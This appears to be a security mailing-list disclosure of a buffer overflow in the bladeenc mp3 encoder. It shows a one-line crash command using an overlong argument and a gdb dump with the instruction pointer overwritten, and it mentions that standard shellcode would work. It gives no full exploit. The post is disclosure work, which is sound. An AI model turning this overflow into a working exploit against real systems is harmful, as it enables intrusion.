buffer overflow in bladeenc

[Peter Boutzev <boutzev () bulgaria com>]

Hello everybody,

Some time ago I discovered a buffer overflow vulnerability in bladeenc. 

Bladeenc is an open source mp3 encoder, widely used under linux. 

The program segfaults when a large string is given as argument on program 
startup. Under normal conditions, the syntax of bladeenc is like :

bladeenc filename.wav

If you change 'filename.wav' with a large string (around 300 chars), bladeenc
crashes, overwriting %eip. Also, other options which can be specified trough
argv[] can be exploited too. (I guess that the problem can be found in the 
argument parsing functions of the program - I didn't have much time to 
investigate the source, but a brief grep strcpy of the source gives few lines 
of output which may be useful)

Bellow is a shot of what happens :

[pesho@dingo stack]$ bladeenc `perl -e "print 'a' x 300"`
Segmentation fault (core dumped)
[pesho@dingo stack]$ gdb bladeenc core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
........
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb) info reg
eax            0x41414141       1094795585
ecx            0x12c    300
edx            0xbffffa00       -1073743360
ebx            0x41414141       1094795585
esp            0xbfffe470       0xbfffe470
ebp            0x41414141       0x41414141   <---
esi            0x41414141       1094795585   <---
edi            0x41414141       1094795585   <---
eip            0x41414141       0x41414141    <--- here we are ...
eflags         0x10216  66070
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x804a34a        134521674
foseg          0x2b     43
fooff          0xbfffe4d8       -1073748776
fop            0x59d    1437
(gdb)

So, as you see, the overflow is exploitable. I am not going to post
an exploit to it, although very basic standard shellcode works against it.

The overflow isn't really a security hole, since the binary isn't setuid. 
However, looking around with google, there are few systems that use
bladeenc for some kind of 'distributed mp3 encoding'. They apparently consist
of different daemons exchanging parts of audio and encoding them with 
bladeenc. There are few of those systems that could possibly be explited (and 
probably REMOTELY) using this overflow. 

Maybe someone on the list would like to test such systems and do some more
research on the 'vulnerability'. 

For people who would like to test, standard shellcode from 'smashing the 
stack ...' should do the job.

The author has been informed around two months ago - no answer received.
At the time of the tests, the last stable version was still vulnerable - I 
don't know if the version has changed since.

Thank you all.

Peter
-- 
------------------------------------------------------------------
  Peter Boutzev                        Ubizen (Luxembourg) 
  Securirty Engineer                   We Secure e-Business
  Phone   +352 26 31 05 85       http://www.ubizen.com
  Fax     +352 26 31 05 86 
------------------------------------------------------------------

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

mQGiBDpxOmQRBACXNyC+kUQ5vpB33ogP+AERWaDmN67MDAhHCnD/BOCrRIII/3a5
tMuNOM7ZaxB4WzLuh22D3W4qZ+hiyT4YmPZY3Bp5BPlk9sw9edg4lA2vAVyUZTFP
7Vth30IPVv1ZKQzLjbCqWhcifogBnfa2bSK7zDdtGopyqxrAquGzidKZWwCg0jTJ
L5dxS7X1bRSuOvzfshAgkc0D/3/A4FZ8H96muARXzK2UmcTiZCMiqljeMqRVj5EF
n9h1+YpnztKol4Aet1Jzc5NAkWdKJekWeEtD+o1PPMIk8JqznxeJKNvEz3w7GXkc
ev3NlD1CE/vmOjVY3HL+vuy7roi0s9JjlR8Vx8PUGB33XkExyDV5hwwu5FvhWbBc
CYwEA/9QnoEen3atWc4f68ybkOHK5SwVPsJAMCopcrxDZLi/Zeb5t089m/GBQuwx
k/r3CAZsFNE9MfxlRI4pqGQIM0i181XMrWhWCd94Oye6ZtZwld4lLhj63G79mGwA
gTstI5wN8CjLKGPMXBMekbRKZF9cFmQyMg59zIDxvsPxRRfNqLRRUGV0ZXIgQm91
dHpldiAoU2VjdXJpdHkgRW5naW5lZXIsIFViaXplbiAtIEx1eGVtYm91cmcpIDxw
ZXRlci5ib3V0emV2QHViaXplbi5jb20+iFYEExECABYFAjpxOmQECwoEAwMVAwID
FgIBAheAAAoJEBsz1EGWGSGhIz8An1pkbyiaT7ro0w2e+Nzfrmim2i4dAJ44gYu5
d2fWx/zPaEmjPL5teL3stbkCDQQ6cTqEEAgAoztHrJYizUxHMZn+PLGBLR1IX8ox
3KLnADxcMRPTnFdckdI/2ri9/Khdx7X9Pq29vN9Tr6/DBu0wneje3xizuTOi18Ho
PHlTYQEvacJgvpYVWdkDMOPqSYD3/0uPV5k2Ei9fUuw9Sh5iykWzwMMWeZHLjXVf
hBEM1VhXPxxnW6KmpLfw1LH8Zso/CWSdXtnwPfApY/GfHFtowicg9aPCgnCKfG6T
/rRMlZJPCt8ViZ+2yH6GvVb/P1a9+VPjN1WpRCeaKDai/UYBMTT/Zm5dPa55pVOe
cqKYYygYeG8Tm3COA28PUlongS26atUhUuESFL5j5+DDkbxYUwLcNJ3vLwADBQf/
eB904eWKB19K0JNG3/KBS40KLNJ5wKgRrEpo9pWXJajMaLy2lJStMh4ZxOuklKvJ
A+c8cZIw+D6fC2SHuyL2vTN76cCgLYAk82pbvJuYFWOBOqJhzMfTIp31phcAlqaA
gDiG2yUFnxJ8QnbTLNYvbisT964ehPN3bQkRDAkEUZHl6EK7K/gu8HNDp0/wcSxR
BSKfrFbSK/iVlBbhKBWjKXx5B3pzfoqu0pTTqIZ4u1At9d81jKkTpIKELIVMLsoP
eXxL7quSmKW5GHUi0e2t9LBKZLHkAQ9GsEKyn3wDgQpX2UoI3wMjSsRs/jv0FxRp
7+pgtVEDkq891VFP2v0MzohGBBgRAgAGBQI6cTqEAAoJEBsz1EGWGSGhuuEAn2Rc
Q/Uo5rUScmLD4rJkCVUKomREAJ9i34KDIjrHXnw6R2pU21+INRetUA==
=uLhC
-----END PGP PUBLIC KEY BLOCK-----